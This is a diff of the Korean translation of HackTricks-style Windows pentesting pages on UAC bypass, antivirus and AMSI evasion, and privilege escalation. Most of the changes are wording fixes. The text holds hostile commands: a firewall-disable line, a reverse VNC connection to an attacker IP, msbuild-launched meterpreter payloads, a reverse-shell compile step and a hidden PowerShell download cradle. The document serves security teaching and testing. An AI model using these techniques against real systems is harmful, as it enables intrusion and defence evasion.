+값이 **`0`**이면 **RID 500** 사용자 (**내장 관리자**)만 **UAC 없이 관리 작업을 수행할 수** 있으며, `1`이면 **"Administrators"** 그룹 내의 모든 계정이 이를 수행할 수 있습니다.
 
-마지막으로 **`FilterAdministratorToken`** 키의 값을 확인해야 함\
-**`0`**(기본값)일 경우 **내장 관리자 계정은** 원격 관리 작업을 수행할 수 있으며, **`1`**일 경우 내장 관리자 계정은 `LocalAccountTokenFilterPolicy`가 `1`로 설정되지 않는 한 원격 관리 작업을 수행할 수 없음.
+마지막으로 **`FilterAdministratorToken`** 키의 값을 확인해야 합니다\
+값이 **`0`**(기본값)인 경우 **내장 관리자 계정이** 원격 관리 작업을 수행할 수 있으며, **`1`**인 경우 내장 관리자 계정은 `LocalAccountTokenFilterPolicy`가 `1`로 설정되지 않는 한 원격 관리 작업을 수행할 수 없습니다.
 
 #### 요약
 
-- `EnableLUA=0` 또는 **존재하지 않음**이면 **누구에게도 UAC 없음**
-- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=1`**이면 **누구에게도 UAC 없음**
-- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0`** 및 **`FilterAdministratorToken=0`**이면 RID 500 (내장 관리자)에게 UAC 없음
-- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0`** 및 **`FilterAdministratorToken=1`**이면 모든 사람에게 UAC 있음
+- `EnableLUA=0` 또는 **존재하지 않으면**, **누구에게도 UAC 없음**
+- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=1`이면, 누구에게도 UAC 없음**
+- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0` 및 `FilterAdministratorToken=0`이면, RID 500 (내장 관리자)에게는 UAC 없음**
+- `EnableLua=1`이고 **`LocalAccountTokenFilterPolicy=0` 및 `FilterAdministratorToken=1`이면, 모두에게 UAC 있음**
 
-이 모든 정보는 **metasploit** 모듈: `post/windows/gather/win_privs`를 사용하여 수집할 수 있음
+이 모든 정보는 **metasploit** 모듈: `post/windows/gather/win_privs`를 사용하여 수집할 수 있습니다.
 
-사용자의 그룹을 확인하고 무결성 수준을 얻을 수도 있음:
+사용자의 그룹을 확인하고 무결성 수준을 얻을 수도 있습니다:
 ```
 net user %username%
 whoami /groups | findstr Level
@@ -85,11 +85,11 @@ whoami /groups | findstr Level
 ## UAC 우회
 
 > [!NOTE]
-> 피해자에게 그래픽 접근이 가능하다면, UAC 프롬프트가 나타날 때 "예"를 클릭하기만 하면 UAC 우회가 간단합니다.
+> 피해자에게 그래픽 접근이 가능하다면, UAC 우회는 간단합니다. UAC 프롬프트가 나타날 때 "예"를 클릭하면 됩니다.
 
 UAC 우회는 다음 상황에서 필요합니다: **UAC가 활성화되어 있고, 프로세스가 중간 무결성 컨텍스트에서 실행되며, 사용자가 관리자 그룹에 속하는 경우**.
 
-UAC가 **가장 높은 보안 수준(항상)에 있을 때 UAC를 우회하는 것이 다른 수준(기본)에 비해 훨씬 더 어렵다는 점을 언급하는 것이 중요합니다.**
+UAC가 **가장 높은 보안 수준(항상)에 있을 때 우회하는 것이 다른 수준(기본)에 비해 훨씬 더 어렵다는 점을 언급하는 것이 중요합니다.**
 
 ### UAC 비활성화
 
@@ -139,8 +139,8 @@ runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.w
 
 ### UAC 우회 익스플로잇
 
-[**UACME**](https://github.com/hfiref0x/UACME)는 여러 UAC 우회 익스플로잇의 **컴파일**입니다. **visual studio 또는 msbuild를 사용하여 UACME를 컴파일해야** 한다는 점에 유의하세요. 컴파일은 여러 실행 파일을 생성합니다(예: `Source\Akagi\outout\x64\Debug\Akagi.exe`), **어떤 파일이 필요한지 알아야** 합니다.\
-일부 우회는 **다른 프로그램을 요청**하여 **사용자**에게 무언가가 발생하고 있음을 **알릴 수** 있으므로 **주의해야** 합니다.
+[**UACME**](https://github.com/hfiref0x/UACME)는 여러 UAC 우회 익스플로잇의 **컴파일**입니다. **Visual Studio 또는 msbuild를 사용하여 UACME를 컴파일해야** 한다는 점에 유의하세요. 컴파일은 여러 실행 파일(예: `Source\Akagi\outout\x64\Debug\Akagi.exe`)을 생성하며, **어떤 것이 필요한지 알아야** 합니다.\
+일부 우회 방법은 **다른 프로그램을 알림**하여 **사용자**에게 무언가가 발생하고 있음을 **알릴 수** 있으므로 **주의해야** 합니다.
 
 UACME는 각 기술이 작동하기 시작한 **빌드 버전**을 가지고 있습니다. 귀하의 버전에 영향을 미치는 기술을 검색할 수 있습니다:
 ```
@@ -154,7 +154,7 @@ Major  Minor  Build  Revision
 
 #### 더 많은 UAC 우회
 
-**여기에서 AUC를 우회하는 데 사용되는 모든** 기술은 **피해자와의 완전한 대화형 셸**을 **필요로** 합니다(일반 nc.exe 셸은 충분하지 않습니다).
+**여기에서 AUC를 우회하는 데 사용되는 모든** 기술은 **피해자와의 완전한 대화형 셸**을 **요구**합니다(일반 nc.exe 셸은 충분하지 않습니다).
 
 **meterpreter** 세션을 사용하여 얻을 수 있습니다. **Session** 값이 **1**인 **프로세스**로 마이그레이션하십시오:
 
@@ -166,15 +166,15 @@ Major  Minor  Build  Revision
 
 **GUI에 접근할 수 있다면 UAC 프롬프트가 나타날 때 그냥 수락하면 됩니다**, 실제로 우회할 필요는 없습니다. 따라서 GUI에 접근하면 UAC를 우회할 수 있습니다.
 
-게다가, 누군가가 사용 중인 GUI 세션(잠재적으로 RDP를 통해)에 접근하면 **관리자로 실행되는 몇 가지 도구가 있을 수 있습니다**. 여기서 **cmd**를 예를 들어 **관리자**로 직접 실행할 수 있습니다. UAC에 의해 다시 프롬프트되지 않습니다. [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)와 같은 도구가 있습니다. 이는 좀 더 **은밀할 수 있습니다**.
+게다가, 누군가가 사용 중인 GUI 세션(잠재적으로 RDP를 통해)에 접근하면 **관리자로 실행되는 몇 가지 도구**가 있어 **cmd**를 예를 들어 **관리자 권한으로** 직접 실행할 수 있습니다. UAC에 의해 다시 프롬프트되지 않습니다. [**https://github.com/oski02/UAC-GUI-Bypass-appverif**](https://github.com/oski02/UAC-GUI-Bypass-appverif)와 같은 도구입니다. 이는 좀 더 **은밀할 수 있습니다**.
 
 ### 시끄러운 무차별 대입 UAC 우회
 
-시끄러운 것이 신경 쓰이지 않는다면 항상 [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin)과 같은 것을 **실행할 수 있습니다**. 이는 **사용자가 수락할 때까지 권한 상승을 요청합니다**.
+시끄러운 것이 신경 쓰이지 않는다면 항상 **다음과 같은 것을 실행할 수 있습니다**: [**https://github.com/Chainski/ForceAdmin**](https://github.com/Chainski/ForceAdmin) 이 도구는 **사용자가 수락할 때까지 권한 상승을 요청합니다**.
 
 ### 나만의 우회 - 기본 UAC 우회 방법론
 
-**UACME**를 살펴보면 **대부분의 UAC 우회가 Dll Hijacking 취약점을 악용한다는 것을 알 수 있습니다**(주로 _C:\Windows\System32_에 악성 dll을 작성하는 방식). [Dll Hijacking 취약점을 찾는 방법을 배우려면 여기를 읽으십시오](../windows-local-privilege-escalation/dll-hijacking/).
+**UACME**를 살펴보면 **대부분의 UAC 우회가 Dll Hijacking 취약점을 악용한다는 것을 알 수 있습니다**(주로 악성 dll을 _C:\Windows\System32_에 작성하는 방식). [Dll Hijacking 취약점을 찾는 방법을 배우려면 여기를 읽으세요](../windows-local-privilege-escalation/dll-hijacking/).
 
 1. **자동 상승**하는 이진 파일을 찾습니다(실행 시 높은 무결성 수준에서 실행되는지 확인).
 2. procmon을 사용하여 **DLL Hijacking**에 취약할 수 있는 "**NAME NOT FOUND**" 이벤트를 찾습니다.
@@ -185,6 +185,6 @@ Major  Minor  Build  Revision
 
 ### 또 다른 UAC 우회 기술
 
-**자동 상승 이진 파일**이 **실행될** **이진** 또는 **명령**의 **이름/경로**를 **레지스트리**에서 **읽으려고** 하는지 감시하는 것입니다(이진 파일이 **HKCU** 내에서 이 정보를 검색하는 경우 더 흥미롭습니다).
+**자동 상승 이진 파일**이 **레지스트리**에서 **이진 파일** 또는 **명령**의 **이름/경로**를 **읽으려** 하는지 감시하는 것입니다(이진 파일이 **HKCU** 내에서 이 정보를 검색하는 경우 더 흥미롭습니다).
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md
index 730a35736..53e6ce4de 100644
--- a/src/windows-hardening/av-bypass.md
+++ b/src/windows-hardening/av-bypass.md
@@ -6,11 +6,11 @@
 
 ## **AV 회피 방법론**
 
-현재 AV는 파일이 악성인지 여부를 확인하기 위해 정적 탐지, 동적 분석 및 더 고급 EDR의 경우 행동 분석과 같은 다양한 방법을 사용합니다.
+현재 AV는 파일이 악성인지 여부를 확인하기 위해 정적 탐지, 동적 분석 및 더 발전된 EDR의 경우 행동 분석과 같은 다양한 방법을 사용합니다.
 
 ### **정적 탐지**
 
-정적 탐지는 이진 파일이나 스크립트에서 알려진 악성 문자열이나 바이트 배열을 플래그 지정하고 파일 자체에서 정보를 추출하여 달성됩니다(예: 파일 설명, 회사 이름, 디지털 서명, 아이콘, 체크섬 등). 이는 알려진 공개 도구를 사용하면 더 쉽게 적발될 수 있음을 의미합니다. 왜냐하면 이러한 도구는 아마도 분석되어 악성으로 플래그가 지정되었기 때문입니다. 이러한 종류의 탐지를 우회하는 몇 가지 방법이 있습니다:
+정적 탐지는 이진 파일이나 스크립트에서 알려진 악성 문자열이나 바이트 배열을 플래그 지정하고 파일 자체에서 정보를 추출하여 달성됩니다(예: 파일 설명, 회사 이름, 디지털 서명, 아이콘, 체크섬 등). 이는 알려진 공개 도구를 사용하면 더 쉽게 발각될 수 있음을 의미합니다. 왜냐하면 이러한 도구는 아마도 분석되어 악성으로 플래그가 지정되었기 때문입니다. 이러한 종류의 탐지를 우회하는 몇 가지 방법이 있습니다:
 
 - **암호화**
 
@@ -34,7 +34,7 @@
 동적 분석은 AV가 이진 파일을 샌드박스에서 실행하고 악성 활동을 감시하는 것입니다(예: 브라우저의 비밀번호를 복호화하고 읽으려 하거나, LSASS에서 미니 덤프를 수행하는 등). 이 부분은 다루기가 조금 더 까다로울 수 있지만, 샌드박스를 회피하기 위해 할 수 있는 몇 가지 방법이 있습니다.
 
 - **실행 전 대기** 구현 방식에 따라 AV의 동적 분석을 우회하는 좋은 방법이 될 수 있습니다. AV는 사용자의 작업 흐름을 방해하지 않기 위해 파일을 스캔할 시간이 매우 짧기 때문에 긴 대기를 사용하면 이진 파일 분석을 방해할 수 있습니다. 문제는 많은 AV의 샌드박스가 구현 방식에 따라 대기를 건너뛸 수 있다는 것입니다.
-- **컴퓨터 자원 확인** 일반적으로 샌드박스는 작업할 수 있는 자원이 매우 적습니다(예: < 2GB RAM). 그렇지 않으면 사용자의 컴퓨터를 느리게 만들 수 있습니다. 여기서 매우 창의적으로 접근할 수 있습니다. 예를 들어 CPU의 온도나 팬 속도를 확인하는 것과 같이 샌드박스에 구현되지 않은 것들이 많습니다.
+- **컴퓨터 자원 확인** 일반적으로 샌드박스는 작업할 수 있는 자원이 매우 적습니다(예: < 2GB RAM), 그렇지 않으면 사용자의 컴퓨터를 느리게 만들 수 있습니다. 여기서 매우 창의적으로 접근할 수 있습니다. 예를 들어 CPU의 온도나 팬 속도를 확인하는 것과 같이 샌드박스에 구현되지 않은 것들이 많습니다.
 - **기계 특정 검사** "contoso.local" 도메인에 가입된 사용자를 타겟으로 하려면 컴퓨터의 도메인을 확인하여 지정한 도메인과 일치하는지 확인할 수 있습니다. 일치하지 않으면 프로그램을 종료할 수 있습니다.
 
 Microsoft Defender의 샌드박스 컴퓨터 이름은 HAL9TH이므로, 폭발 전에 악성코드에서 컴퓨터 이름을 확인할 수 있습니다. 이름이 HAL9TH와 일치하면 Defender의 샌드박스 안에 있다는 의미이므로 프로그램을 종료할 수 있습니다.
@@ -49,10 +49,10 @@ Microsoft Defender의 샌드박스 컴퓨터 이름은 HAL9TH이므로, 폭발 
 
 예를 들어, LSASS를 덤프하려면 **정말로 mimikatz를 사용해야 하나요**? 아니면 덜 알려진 다른 프로젝트를 사용하여 LSASS를 덤프할 수 있을까요?
 
-정답은 아마 후자일 것입니다. mimikatz를 예로 들면, 아마도 AV와 EDR에 의해 가장 많이 플래그가 지정된 악성코드 중 하나일 것입니다. 프로젝트 자체는 매우 멋지지만, AV를 우회하기 위해 작업하는 것은 악몽과도 같습니다. 따라서 달성하려는 목표에 대한 대안을 찾아보세요.
+정확한 대답은 아마 후자일 것입니다. mimikatz를 예로 들면, 아마도 AV와 EDR에 의해 가장 많이 플래그가 지정된 악성코드 중 하나일 것입니다. 프로젝트 자체는 매우 멋지지만, AV를 우회하기 위해 작업하기에는 악몽과도 같습니다. 따라서 달성하려는 목표에 대한 대안을 찾아보세요.
 
 > [!NOTE]
-> 회피를 위해 페이로드를 수정할 때는 Defender에서 **자동 샘플 제출을 끄는 것**을 잊지 마세요. 그리고 제발, 진지하게, **VIRUSTOTAL에 업로드하지 마세요**. 장기적으로 회피를 달성하는 것이 목표라면 말이죠. 특정 AV에서 페이로드가 탐지되는지 확인하고 싶다면 VM에 설치하고 자동 샘플 제출을 끄고 결과에 만족할 때까지 테스트하세요.
+> 회피를 위해 페이로드를 수정할 때는 Defender에서 **자동 샘플 제출을 끄는 것**을 잊지 마세요. 그리고 제발, 진지하게, **VIRUSTOTAL에 업로드하지 마세요**. 장기적으로 회피를 달성하는 것이 목표라면 말입니다. 특정 AV에서 페이로드가 탐지되는지 확인하고 싶다면 VM에 설치하고 자동 샘플 제출을 끄고 결과에 만족할 때까지 테스트하세요.
 
 ## EXE와 DLL
 
@@ -127,7 +127,7 @@ Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freez
 
 ## AMSI (안티 맬웨어 스캔 인터페이스)
 
-AMSI는 "[파일 없는 맬웨어](https://en.wikipedia.org/wiki/Fileless_malware)"를 방지하기 위해 만들어졌습니다. 처음에 AV는 **디스크의 파일**만 스캔할 수 있었기 때문에, 만약 어떤 방법으로든 **메모리에서 직접 페이로드를 실행**할 수 있다면, AV는 이를 방지할 수 있는 충분한 가시성이 없었습니다.
+AMSI는 "[파일리스 맬웨어](https://en.wikipedia.org/wiki/Fileless_malware)"를 방지하기 위해 만들어졌습니다. 처음에 AV는 **디스크의 파일**만 스캔할 수 있었기 때문에, 만약 페이로드를 **직접 메모리에서 실행**할 수 있다면 AV는 이를 방지할 수 있는 충분한 가시성이 없었습니다.
 
 AMSI 기능은 Windows의 다음 구성 요소에 통합되어 있습니다.
 
@@ -153,11 +153,11 @@ AMSI를 우회하는 방법은 몇 가지가 있습니다:
 
 AMSI는 주로 정적 감지와 함께 작동하므로, 로드하려는 스크립트를 수정하는 것이 감지를 회피하는 좋은 방법이 될 수 있습니다.
 
-그러나 AMSI는 여러 레이어가 있더라도 스크립트를 난독화 해제할 수 있는 기능이 있으므로, 난독화가 어떻게 이루어졌는지에 따라 나쁜 선택이 될 수 있습니다. 이는 회피를 간단하지 않게 만듭니다. 하지만 때때로, 변수 이름 몇 개만 변경하면 괜찮아지므로, 얼마나 많은 것이 플래그가 지정되었는지에 따라 다릅니다.
+그러나 AMSI는 여러 레이어가 있더라도 스크립트를 난독화 해제할 수 있는 기능이 있으므로, 난독화가 어떻게 이루어졌는지에 따라 나쁜 선택이 될 수 있습니다. 이는 회피를 간단하지 않게 만듭니다. 하지만 때때로, 변수 이름 몇 개만 변경하면 괜찮아질 수 있으므로, 얼마나 많은 것이 플래그가 되었는지에 따라 다릅니다.
 
 - **AMSI 우회**
 
-AMSI는 powershell (또는 cscript.exe, wscript.exe 등) 프로세스에 DLL을 로드하여 구현되므로, 비특권 사용자로 실행하더라도 쉽게 조작할 수 있습니다. AMSI 구현의 이 결함으로 인해 연구자들은 AMSI 스캔을 회피하는 여러 방법을 발견했습니다.
+AMSI는 powershell (또한 cscript.exe, wscript.exe 등) 프로세스에 DLL을 로드하여 구현되므로, 비특권 사용자로 실행하더라도 쉽게 조작할 수 있습니다. AMSI 구현의 이 결함으로 인해 연구자들은 AMSI 스캔을 회피하는 여러 방법을 발견했습니다.
 
 **오류 강제 발생**
 
@@ -196,7 +196,7 @@ PowerShell을 사용하여 AMSI를 우회하는 데 사용되는 다른 많은 
 
 ## 난독화
 
-다음과 같은 **C# 클리어 텍스트 코드**를 **난독화**하거나 이진 파일을 컴파일하기 위한 **메타프로그래밍 템플릿**을 생성하거나 **컴파일된 이진 파일**을 난독화하는 데 사용할 수 있는 여러 도구가 있습니다:
+C# 클리어 텍스트 코드를 **난독화**하거나 이진 파일을 컴파일하기 위한 **메타프로그래밍 템플릿**을 생성하거나 **컴파일된 이진 파일을 난독화**하는 데 사용할 수 있는 여러 도구가 있습니다:
 
 - [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# 난독화기**
 - [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): 이 프로젝트의 목표는 [LLVM](http://www.llvm.org/) 컴파일러 스위트의 오픈 소스 포크를 제공하여 [코드 난독화](<http://en.wikipedia.org/wiki/Obfuscation_(software)>) 및 변조 방지를 통해 소프트웨어 보안을 강화하는 것입니다.
@@ -231,7 +231,7 @@ SmartScreen은 주로 평판 기반 접근 방식으로 작동하며, 이는 일
 
 [**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/)는 Mark-of-the-Web을 피하기 위해 페이로드를 출력 컨테이너에 패키징하는 도구입니다.
 
-예제 사용법:
+예시 사용법:
 ```powershell
 PS C:\Tools\PackMyPayload> python .\PackMyPayload.py .\TotallyLegitApp.exe container.iso
 
@@ -261,7 +261,7 @@ Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files
 
 C# 바이너리를 메모리에 로드하는 것은 꽤 오랫동안 알려져 있으며, AV에 걸리지 않고 포스트 익스플로잇 도구를 실행하는 매우 좋은 방법입니다.
 
-페이로드가 디스크를 건드리지 않고 메모리에 직접 로드되기 때문에, 전체 프로세스에 대해 AMSI 패치를 걱정해야 합니다.
+페이로드가 디스크를 건드리지 않고 메모리에 직접 로드되기 때문에, 전체 프로세스에 대해 AMSI 패치에 대해서만 걱정하면 됩니다.
 
 대부분의 C2 프레임워크(슬리버, 코버넌트, 메타스플로잇, 코발트스트라이크, 하복 등)는 이미 메모리에서 C# 어셈블리를 직접 실행할 수 있는 기능을 제공하지만, 이를 수행하는 방법은 여러 가지가 있습니다:
 
@@ -273,7 +273,7 @@ C# 바이너리를 메모리에 로드하는 것은 꽤 오랫동안 알려져 
 
 - **Inline**
 
-이는 포스트 익스플로잇 악성 코드를 **자신의 프로세스에 주입하는 것**입니다. 이렇게 하면 새로운 프로세스를 생성하고 AV에 의해 스캔되는 것을 피할 수 있지만, 단점은 페이로드 실행 중 문제가 발생하면 **비콘을 잃을 가능성이 훨씬 더 높아진다는** 것입니다. 
+이는 포스트 익스플로잇 악성 코드를 **자신의 프로세스에 주입하는 것**입니다. 이렇게 하면 새로운 프로세스를 생성하고 AV에 의해 스캔되는 것을 피할 수 있지만, 단점은 페이로드 실행에 문제가 생기면 **비콘을 잃을 가능성이 훨씬 더 높아진다는** 것입니다. 
 
 <figure><img src="../images/image (1136).png" alt=""><figcaption></figcaption></figure>
 
@@ -286,9 +286,9 @@ C# 바이너리를 메모리에 로드하는 것은 꽤 오랫동안 알려져 
 
 [**https://github.com/deeexcee-io/LOI-Bins**](https://github.com/deeexcee-io/LOI-Bins)에서 제안한 바와 같이, 손상된 머신에 **공격자 제어 SMB 공유에 설치된 인터프리터 환경에 대한 접근을 제공함으로써** 다른 언어를 사용하여 악성 코드를 실행할 수 있습니다.
 
-SMB 공유에서 인터프리터 바이너리와 환경에 대한 접근을 허용함으로써, 손상된 머신의 **메모리 내에서 이러한 언어로 임의의 코드를 실행할 수 있습니다.**
+SMB 공유에서 인터프리터 바이너리 및 환경에 대한 접근을 허용함으로써, 손상된 머신의 **메모리 내에서 이러한 언어로 임의의 코드를 실행할 수 있습니다.**
 
-레포는 다음과 같이 언급합니다: Defender는 여전히 스크립트를 스캔하지만 Go, Java, PHP 등을 활용함으로써 **정적 서명을 우회할 수 있는 더 많은 유연성을 갖습니다.** 이러한 언어로 무작위로 난독화되지 않은 리버스 셸 스크립트로 테스트한 결과 성공적이었습니다.
+레포지토리는 다음과 같이 언급합니다: Defender는 여전히 스크립트를 스캔하지만 Go, Java, PHP 등을 활용함으로써 **정적 서명을 우회할 수 있는 더 많은 유연성을 제공합니다.** 이러한 언어로 무작위로 난독화되지 않은 리버스 셸 스크립트로 테스트한 결과 성공적이었습니다.
 
 ## Advanced Evasion
 
@@ -309,11 +309,11 @@ SMB 공유에서 인터프리터 바이너리와 환경에 대한 접근을 허
 ### **Check which parts Defender finds as malicious**
 
 [**ThreatCheck**](https://github.com/rasta-mouse/ThreatCheck)를 사용하여 **바이너리의 일부를 제거**하여 **Defender가 악성으로 찾는 부분을 알아내고** 이를 분리할 수 있습니다.\
-또한 [**avred**](https://github.com/dobin/avred)라는 도구도 **같은 작업을 수행하며**, [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)에서 서비스를 제공하는 오픈 웹이 있습니다.
+또한 **같은 작업을 수행하는 도구는** [**avred**](https://github.com/dobin/avred)로, [**https://avred.r00ted.ch/**](https://avred.r00ted.ch/)에서 서비스를 제공하는 오픈 웹이 있습니다.
 
 ### **Telnet Server**
 
-Windows 10까지 모든 Windows에는 **Telnet 서버**가 포함되어 있었으며, 이를 설치할 수 있었습니다(관리자로).
+Windows 10 이전까지 모든 Windows에는 **Telnet 서버**가 포함되어 있었으며, 이를 설치할 수 있었습니다(관리자로서):
 ```bash
 pkgmgr /iu:"TelnetServer" /quiet
 ```
@@ -340,7 +340,7 @@ netsh advfirewall set allprofiles state off
 
 #### **역방향 연결**
 
-**공격자**는 **호스트** 내에서 이진 파일 `vncviewer.exe -listen 5900`를 **실행**하여 역방향 **VNC 연결**을 수신할 준비를 해야 합니다. 그런 다음, **희생자** 내에서: winvnc 데몬을 시작합니다 `winvnc.exe -run` 및 `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`를 실행합니다
+**공격자**는 **호스트** 내에서 이진 파일 `vncviewer.exe -listen 5900`를 **실행**하여 역방향 **VNC 연결**을 수신할 준비를 합니다. 그런 다음, **희생자** 내에서: winvnc 데몬을 시작합니다 `winvnc.exe -run` 및 `winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900`를 실행합니다
 
 **경고:** 은폐를 유지하기 위해 몇 가지를 하지 않아야 합니다
 
@@ -368,7 +368,7 @@ sel lport 4444
 generate #payload is the default name
 #This will generate a meterpreter xml and a rcc file for msfconsole
 ```
-이제 **리스터를 시작**하려면 `msfconsole -r file.rc`를 사용하고 **xml 페이로드를 실행**하려면:
+이제 **리스터를 시작**하려면 `msfconsole -r file.rc`를 입력하고 **xml 페이로드를 실행**하려면:
 ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
 ```
@@ -380,7 +380,7 @@ https://medium.com/@Bank\_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
 
 #### 첫 번째 C# 리버스 셸
 
-다음과 같이 컴파일합니다:
+다음과 함께 컴파일하세요:
 ```
 c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
 ```
@@ -519,7 +519,7 @@ https://github.com/TheWover/donut
 # Vulcan
 https://github.com/praetorian-code/vulcan
 ```
-### 더 많은 정보
+### 더 보기
 
 - [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion)
 
diff --git a/src/windows-hardening/basic-cmd-for-pentesters.md b/src/windows-hardening/basic-cmd-for-pentesters.md
index 42e9ebb10..b0ded54a8 100644
--- a/src/windows-hardening/basic-cmd-for-pentesters.md
+++ b/src/windows-hardening/basic-cmd-for-pentesters.md
@@ -1,4 +1,4 @@
-# 기본 윈도우 CMD 사용법 for Pentesters
+# Basic Win CMD for Pentesters
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -326,7 +326,7 @@ encoding
 ```
 ### Listen address ACLs
 
-관리자 권한 없이 [http://+:80/Temporary_Listen_Addresses/](http://+/Temporary_Listen_Addresses/)에서 수신할 수 있습니다.
+관리자가 아니어도 [http://+:80/Temporary_Listen_Addresses/](http://+/Temporary_Listen_Addresses/)에서 수신할 수 있습니다.
 ```bash
 netsh http show urlacl
 ```
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md
index f540dd5ae..2ccfd60e9 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -115,7 +115,7 @@ ValueData : 0
 ```
 ### AMSI 우회
 
-**`amsi.dll`**는 **귀하의 프로세스에 로드**되며, 모든 애플리케이션이 상호작용할 수 있는 필요한 **내보내기**를 가지고 있습니다. 그리고 프로세스의 메모리 공간에 로드되기 때문에 **제어하는** 프로세스의 동작을 **메모리의 명령어를 덮어씀으로써** 변경할 수 있습니다. 이를 통해 아무것도 감지하지 않게 만들 수 있습니다.
+**`amsi.dll`**는 **귀하의 프로세스에 로드**되며, 어떤 애플리케이션이 상호작용할 수 있는 필요한 **내보내기**를 가지고 있습니다. 그리고 프로세스의 메모리 공간에 로드되기 때문에 **제어하는** 프로세스의 동작을 **메모리의 명령어를 덮어씀으로써** 변경할 수 있습니다. 이를 통해 아무것도 감지하지 않게 만들 수 있습니다.
 
 따라서 AMSI 우회의 목표는 **감지를 무용하게 만들기 위해 메모리에서 해당 DLL의 명령어를 덮어쓰는 것입니다**.
 
@@ -168,7 +168,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
 
 Check [**this post for detailed info and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). 소개:
 
-이 새로운 기술은 .NET 메서드의 API 호출 후킹에 의존합니다. .NET 메서드는 메모리에서 네이티브 머신 명령어로 컴파일되어 네이티브 메서드와 매우 유사하게 보입니다. 이러한 컴파일된 메서드는 프로그램의 제어 흐름을 변경하기 위해 후킹할 수 있습니다.
+이 새로운 기술은 .NET 메서드의 API 호출 후킹에 의존합니다. .NET 메서드는 메모리에서 네이티브 머신 명령어로 컴파일되어야 하며, 이는 네이티브 메서드와 매우 유사하게 보입니다. 이러한 컴파일된 메서드는 프로그램의 제어 흐름을 변경하기 위해 후킹할 수 있습니다.
 
 .NET 메서드의 API 호출 후킹을 수행하는 단계는 다음과 같습니다:
 
@@ -181,7 +181,7 @@ Check [**this post for detailed info and the code**](https://practicalsecurityan
 
 ### AMSI Bypass 3 - SeDebug Privilege
 
-[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) you can see how with enough privileges to debug processes, you can spawn a powershell.exe process, debug it, monitor when it loads `amsi.dll` and disable it.
+[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) 를 따르면, 프로세스를 디버그할 수 있는 충분한 권한이 있으면 powershell.exe 프로세스를 생성하고, 이를 디버그하며, `amsi.dll`이 로드될 때 모니터링하고 비활성화할 수 있습니다.
 
 ### AMSI Bypass - More Resources
 
@@ -252,7 +252,7 @@ Password       : 1ts-mag1c!!!
 SecurePassword : System.Security.SecureString
 Domain         : HTB
 ```
-XML 형식으로 직접 구문 분석:
+XML 형식으로 직접 파싱:
 ```powershell
 $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
 
diff --git a/src/windows-hardening/checklist-windows-privilege-escalation.md b/src/windows-hardening/checklist-windows-privilege-escalation.md
index ac2da49dc..6e005ca04 100644
--- a/src/windows-hardening/checklist-windows-privilege-escalation.md
+++ b/src/windows-hardening/checklist-windows-privilege-escalation.md
@@ -52,14 +52,14 @@
 ### [서비스](windows-local-privilege-escalation/#services)
 
 - [ ] [**서비스를 수정할 수 있나요**?](windows-local-privilege-escalation/#permissions)
-- [ ] [**서비스에 의해 실행되는 바이너리를 수정할 수 있나요**?](windows-local-privilege-escalation/#modify-service-binary-path)
-- [ ] [**서비스의 레지스트리를 수정할 수 있나요**?](windows-local-privilege-escalation/#services-registry-modify-permissions)
+- [ ] [**서비스에 의해 실행되는 바이너리**를 **수정할 수 있나요**?](windows-local-privilege-escalation/#modify-service-binary-path)
+- [ ] [**서비스의 레지스트리**를 **수정할 수 있나요**?](windows-local-privilege-escalation/#services-registry-modify-permissions)
 - [ ] [**인용되지 않은 서비스** 바이너리 **경로**를 이용할 수 있나요?](windows-local-privilege-escalation/#unquoted-service-paths)
 
 ### [**응용 프로그램**](windows-local-privilege-escalation/#applications)
 
 - [ ] **설치된 응용 프로그램에 대한** [**쓰기** 권한](windows-local-privilege-escalation/#write-permissions)
-- [ ] [**시작 응용 프로그램**](windows-local-privilege-escalation/#run-at-startup)
+- [ ] [**시작 프로그램**](windows-local-privilege-escalation/#run-at-startup)
 - [ ] **취약한** [**드라이버**](windows-local-privilege-escalation/#drivers)
 
 ### [DLL 하이재킹](windows-local-privilege-escalation/#path-dll-hijacking)
@@ -100,14 +100,14 @@
 - [ ] [**휴지통 안의 흥미로운 파일**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
 - [ ] [**자격 증명을 포함하는 다른 레지스트리**](windows-local-privilege-escalation/#inside-the-registry)?
 - [ ] [**브라우저 데이터**](windows-local-privilege-escalation/#browsers-history) 안에 (dbs, 기록, 북마크 등)?
-- [ ] [**파일 및 레지스트리에서 일반 비밀번호 검색**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry)
